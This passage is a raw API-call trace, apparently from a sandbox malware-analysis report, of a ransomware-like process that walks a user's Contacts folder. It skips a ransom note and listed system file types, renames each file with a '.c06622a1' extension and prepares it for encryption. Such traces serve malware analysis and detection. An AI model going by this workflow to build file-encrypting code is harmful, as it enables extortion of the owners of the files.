lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0147.358] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd6738320, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6738320, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.359] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0147.359] _wcsicmp (_Str1="Aclviho ASldjfl.contact", _Str2="README.c06622a1.TXT") returned -17 [0147.359] wcsstr (_Str="Aclviho ASldjfl.contact", _SubStr="README") returned 0x0 [0147.359] _wcsicmp (_Str1="autorun.inf", _Str2="Aclviho ASldjfl.contact") returned 18 [0147.359] wcslen (_String="autorun.inf") returned 0xb [0147.359] _wcsicmp (_Str1="boot.ini", _Str2="Aclviho ASldjfl.contact") returned 1 [0147.359] wcslen (_String="boot.ini") returned 0x8 [0147.359] _wcsicmp (_Str1="bootfont.bin", _Str2="Aclviho ASldjfl.contact") returned 1 [0147.359] wcslen (_String="bootfont.bin") returned 0xc [0147.359] _wcsicmp (_Str1="bootsect.bak", _Str2="Aclviho ASldjfl.contact") returned 1 [0147.359] wcslen (_String="bootsect.bak") returned 0xc [0147.359] _wcsicmp (_Str1="desktop.ini", _Str2="Aclviho ASldjfl.contact") returned 3 [0147.359] wcslen (_String="desktop.ini") returned 0xb [0147.359] _wcsicmp (_Str1="iconcache.db", _Str2="Aclviho ASldjfl.contact") returned 8 [0147.359] wcslen (_String="iconcache.db") returned 0xc [0147.359] _wcsicmp (_Str1="ntldr", _Str2="Aclviho ASldjfl.contact") returned 13 [0147.360] wcslen (_String="ntldr") returned 0x5 [0147.360] _wcsicmp (_Str1="ntuser.dat", _Str2="Aclviho ASldjfl.contact") returned 13 [0147.360] wcslen (_String="ntuser.dat") returned 0xa [0147.360] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Aclviho ASldjfl.contact") returned 13 [0147.360] wcslen (_String="ntuser.dat.log") returned 0xe [0147.360] _wcsicmp (_Str1="ntuser.ini", _Str2="Aclviho ASldjfl.contact") returned 13 [0147.360] wcslen (_String="ntuser.ini") returned 0xa [0147.360] _wcsicmp (_Str1="thumbs.db", _Str2="Aclviho ASldjfl.contact") returned 19 [0147.360] wcslen (_String="thumbs.db") returned 0x9 [0147.360] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0147.360] wcslen (_String="386") returned 0x3 [0147.360] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0147.360] wcslen (_String="adv") returned 0x3 [0147.360] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0147.360] wcslen (_String="ani") returned 0x3 [0147.360] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0147.360] wcslen (_String="bat") returned 0x3 [0147.360] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0147.360] wcslen (_String="bin") returned 0x3 [0147.360] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0147.360] wcslen (_String="cab") returned 0x3 [0147.360] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0147.360] wcslen (_String="cmd") returned 0x3 [0147.360] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0147.360] wcslen (_String="com") returned 0x3 [0147.360] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0147.360] wcslen (_String="cpl") returned 0x3 [0147.360] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0147.360] wcslen (_String="cur") returned 0x3 [0147.360] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0147.360] wcslen (_String="deskthemepack") returned 0xd [0147.360] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0147.360] wcslen (_String="diagcab") returned 0x7 [0147.360] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0147.360] wcslen (_String="diagcfg") returned 0x7 [0147.360] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0147.360] wcslen (_String="diagpkg") returned 0x7 [0147.361] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0147.361] wcslen (_String="dll") returned 0x3 [0147.361] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0147.361] wcslen (_String="drv") returned 0x3 [0147.361] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0147.361] wcslen (_String="exe") returned 0x3 [0147.361] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0147.361] wcslen (_String="hlp") returned 0x3 [0147.361] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0147.361] wcslen (_String="icl") returned 0x3 [0147.361] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0147.361] wcslen (_String="icns") returned 0x4 [0147.361] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0147.361] wcslen (_String="ico") returned 0x3 [0147.361] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0147.361] wcslen (_String="ics") returned 0x3 [0147.361] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0147.361] wcslen (_String="idx") returned 0x3 [0147.361] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0147.361] wcslen (_String="ldf") returned 0x3 [0147.361] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0147.361] wcslen (_String="lnk") returned 0x3 [0147.361] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0147.361] wcslen (_String="mod") returned 0x3 [0147.361] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0147.361] wcslen (_String="mpa") returned 0x3 [0147.361] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0147.361] wcslen (_String="msc") returned 0x3 [0147.361] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0147.361] wcslen (_String="msp") returned 0x3 [0147.361] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0147.361] wcslen (_String="msstyles") returned 0x8 [0147.361] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0147.361] wcslen (_String="msu") returned 0x3 [0147.361] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0147.361] wcslen (_String="nls") returned 0x3 [0147.361] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0147.361] wcslen (_String="nomedia") returned 0x7 [0147.362] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0147.362] wcslen (_String="ocx") returned 0x3 [0147.362] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0147.362] wcslen (_String="prf") returned 0x3 [0147.362] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0147.362] wcslen (_String="ps1") returned 0x3 [0147.362] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0147.362] wcslen (_String="rom") returned 0x3 [0147.362] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0147.362] wcslen (_String="rtp") returned 0x3 [0147.362] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0147.362] wcslen (_String="scr") returned 0x3 [0147.362] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0147.362] wcslen (_String="shs") returned 0x3 [0147.362] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0147.362] wcslen (_String="spl") returned 0x3 [0147.362] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0147.362] wcslen (_String="sys") returned 0x3 [0147.362] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0147.362] wcslen (_String="theme") returned 0x5 [0147.362] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0147.362] wcslen (_String="themepack") returned 0x9 [0147.362] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0147.362] wcslen (_String="wpx") returned 0x3 [0147.362] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0147.362] wcslen (_String="lock") returned 0x4 [0147.362] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0147.362] wcslen (_String="key") returned 0x3 [0147.362] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0147.362] wcslen (_String="hta") returned 0x3 [0147.362] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0147.362] wcslen (_String="msi") returned 0x3 [0147.362] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0147.362] wcslen (_String="pdb") returned 0x3 [0147.362] _wcsicmp (_Str1="sql", _Str2="contact") returned 16 [0147.362] wcslen (_String="sql") returned 0x3 [0147.362] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0147.363] wcslen (_String="sqlite") returned 0x6 [0147.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0147.363] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.363] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0147.363] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0147.363] wcscpy (in: _Dest=0x44d00ce, _Source="Aclviho ASldjfl.contact" | out: _Dest="Aclviho ASldjfl.contact") returned="Aclviho ASldjfl.contact" [0147.363] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", dwFileAttributes=0x80) returned 1 [0147.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0147.363] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.363] ReadFile (in: hFile=0x628, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.378] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xed331db2 [0147.378] RtlComputeCrc32 (PartialCrc=0x1db2, Buffer=0x3feb74, Length=0x80) returned 0x456fdf9f [0147.378] RtlComputeCrc32 (PartialCrc=0xdf9f, Buffer=0x3feb74, Length=0x80) returned 0xb26acd2f [0147.378] RtlComputeCrc32 (PartialCrc=0xcd2f, Buffer=0x3feb74, Length=0x80) returned 0x7cfc0177 [0147.378] RtlComputeCrc32 (PartialCrc=0x177, Buffer=0x3feb74, Length=0x80) returned 0x2893b407 [0147.378] CloseHandle (hObject=0x628) returned 1 [0147.378] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.378] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0147.378] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 0x42 [0147.378] wcscpy (in: _Dest=0x44e0104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.378] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.c06622a1"), dwFlags=0x8) returned 1 [0147.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x628 [0147.389] CreateIoCompletionPort (FileHandle=0x628, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.389] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0147.394] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14664b85 [0147.394] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fc91d9 [0147.394] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x796fd603 [0147.394] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fffffc3 [0147.394] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ba22195 [0147.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x86ca293 [0147.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x156c3c4f [0147.395] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ee0b5f2 [0147.398] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x12442e04 [0147.398] RtlComputeCrc32 (PartialCrc=0x2e04, Buffer=0x2f30094, Length=0x80) returned 0x76ec4638 [0147.398] RtlComputeCrc32 (PartialCrc=0x4638, Buffer=0x2f30094, Length=0x80) returned 0x40012686 [0147.398] RtlComputeCrc32 (PartialCrc=0x2686, Buffer=0x2f30094, Length=0x80) returned 0x4d77a0c5 [0147.398] RtlComputeCrc32 (PartialCrc=0xa0c5, Buffer=0x2f30094, Length=0x80) returned 0x90ba3e5d [0147.398] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0147.398] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.398] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.398] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0147.398] _wcsicmp (_Str1="Administrator.contact", _Str2="README.c06622a1.TXT") returned -17 [0147.398] wcsstr (_Str="Administrator.contact", _SubStr="README") returned 0x0 [0147.398] _wcsicmp (_Str1="autorun.inf", _Str2="Administrator.contact") returned 17 [0147.398] wcslen (_String="autorun.inf") returned 0xb [0147.398] _wcsicmp (_Str1="boot.ini", _Str2="Administrator.contact") returned 1 [0147.398] wcslen (_String="boot.ini") returned 0x8 [0147.398] _wcsicmp (_Str1="bootfont.bin", _Str2="Administrator.contact") returned 1 [0147.398] wcslen (_String="bootfont.bin") returned 0xc [0147.398] _wcsicmp (_Str1="bootsect.bak", _Str2="Administrator.contact") returned 1 [0147.398] wcslen (_String="bootsect.bak") returned 0xc [0147.398] _wcsicmp (_Str1="desktop.ini", _Str2="Administrator.contact") returned 3 [0147.398] wcslen (_String="desktop.ini") returned 0xb [0147.398] _wcsicmp (_Str1="iconcache.db", _Str2="Administrator.contact") returned 8 [0147.398] wcslen (_String="iconcache.db") returned 0xc [0147.398] _wcsicmp (_Str1="ntldr", _Str2="Administrator.contact") returned 13 [0147.398] wcslen (_String="ntldr") returned 0x5 [0147.398] _wcsicmp (_Str1="ntuser.dat", _Str2="Administrator.contact") returned 13 [0147.398] wcslen (_String="ntuser.dat") returned 0xa [0147.398] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Administrator.contact") returned 13 [0147.398] wcslen (_String="ntuser.dat.log") returned 0xe [0147.398] _wcsicmp (_Str1="ntuser.ini", _Str2="Administrator.contact") returned 13 [0147.399] wcslen (_String="ntuser.ini") returned 0xa [0147.399] _wcsicmp (_Str1="thumbs.db", _Str2="Administrator.contact") returned 19 [0147.399] wcslen (_String="thumbs.db") returned 0x9 [0147.399] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0147.399] wcslen (_String="386") returned 0x3 [0147.399] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0147.399] wcslen (_String="adv") returned 0x3 [0147.399] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0147.399] wcslen (_String="ani") returned 0x3 [0147.399] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0147.399] wcslen (_String="bat") returned 0x3 [0147.399] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0147.399] wcslen (_String="bin") returned 0x3 [0147.399] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0147.399] wcslen (_String="cab") returned 0x3 [0147.399] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0147.399] wcslen (_String="cmd") returned 0x3 [0147.399] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0147.399] wcslen (_String="com") returned 0x3 [0147.399] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0147.399] wcslen (_String="cpl") returned 0x3 [0147.399] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0147.399] wcslen (_String="cur") returned 0x3 [0147.399] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0147.399] wcslen (_String="deskthemepack") returned 0xd [0147.399] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0147.399] wcslen (_String="diagcab") returned 0x7 [0147.399] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0147.399] wcslen (_String="diagcfg") returned 0x7 [0147.399] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0147.399] wcslen (_String="diagpkg") returned 0x7 [0147.399] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0147.399] wcslen (_String="dll") returned 0x3 [0147.399] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0147.399] wcslen (_String="drv") returned 0x3 [0147.399] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0147.399] wcslen (_String="exe") returned 0x3 [0147.400] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0147.400] wcslen (_String="hlp") returned 0x3 [0147.400] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0147.400] wcslen (_String="icl") returned 0x3 [0147.400] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0147.400] wcslen (_String="icns") returned 0x4 [0147.400] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0147.400] wcslen (_String="ico") returned 0x3 [0147.400] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0147.400] wcslen (_String="ics") returned 0x3 [0147.400] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0147.400] wcslen (_String="idx") returned 0x3 [0147.400] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0147.400] wcslen (_String="ldf") returned 0x3 [0147.400] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0147.400] wcslen (_String="lnk") returned 0x3 [0147.400] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0147.400] wcslen (_String="mod") returned 0x3 [0147.400] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0147.400] wcslen (_String="mpa") returned 0x3 [0147.400] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0147.400] wcslen (_String="msc") returned 0x3 [0147.400] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0147.400] wcslen (_String="msp") returned 0x3 [0147.400] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0147.400] wcslen (_String="msstyles") returned 0x8 [0147.400] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0147.400] wcslen (_String="msu") returned 0x3 [0147.400] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0147.400] wcslen (_String="nls") returned 0x3 [0147.400] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0147.400] wcslen (_String="nomedia") returned 0x7 [0147.400] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0147.400] wcslen (_String="ocx") returned 0x3 [0147.400] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0147.400] wcslen (_String="prf") returned 0x3 [0147.400] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0147.400] wcslen (_String="ps1") returned 0x3 [0147.400] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0147.401] wcslen (_String="rom") returned 0x3 [0147.401] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0147.401] wcslen (_String="rtp") returned 0x3 [0147.401] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0147.401] wcslen (_String="scr") returned 0x3 [0147.401] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0147.401] wcslen (_String="shs") returned 0x3 [0147.401] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0147.401] wcslen (_String="spl") returned 0x3 [0147.401] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0147.401] wcslen (_String="sys") returned 0x3 [0147.401] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0147.401] wcslen (_String="theme") returned 0x5 [0147.401] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0147.401] wcslen (_String="themepack") returned 0x9 [0147.401] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0147.401] wcslen (_String="wpx") returned 0x3 [0147.401] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0147.401] wcslen (_String="lock") returned 0x4 [0147.401] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0147.401] wcslen (_String="key") returned 0x3 [0147.401] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0147.401] wcslen (_String="hta") returned 0x3 [0147.401] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0147.401] wcslen (_String="msi") returned 0x3 [0147.401] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0147.401] wcslen (_String="pdb") returned 0x3 [0147.401] _wcsicmp (_Str1="sql", _Str2="contact") returned 16 [0147.401] wcslen (_String="sql") returned 0x3 [0147.401] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0147.401] wcslen (_String="sqlite") returned 0x6 [0147.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0147.401] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.401] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0147.401] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0147.402] wcscpy (in: _Dest=0x44d00ce, _Source="Administrator.contact" | out: _Dest="Administrator.contact") returned="Administrator.contact" [0147.402] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", dwFileAttributes=0x80) returned 1 [0147.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0147.402] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.402] ReadFile (in: hFile=0x65c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.404] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xbee0725a [0147.404] RtlComputeCrc32 (PartialCrc=0x725a, Buffer=0x3feb74, Length=0x80) returned 0xd9fa272b [0147.404] RtlComputeCrc32 (PartialCrc=0x272b, Buffer=0x3feb74, Length=0x80) returned 0xce2ddbe0 [0147.404] RtlComputeCrc32 (PartialCrc=0xdbe0, Buffer=0x3feb74, Length=0x80) returned 0xd1097d31 [0147.404] RtlComputeCrc32 (PartialCrc=0x7d31, Buffer=0x3feb74, Length=0x80) returned 0x60d9da7b [0147.404] CloseHandle (hObject=0x65c) returned 1 [0147.404] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.404] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0147.404] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 0x40 [0147.404] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.404] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.c06622a1"), dwFlags=0x8) returned 1 [0147.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0147.406] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.406] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0147.411] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x717ee87f [0147.411] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x56239dbc [0147.411] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x9593b3d [0147.411] RtlRandomEx (in: 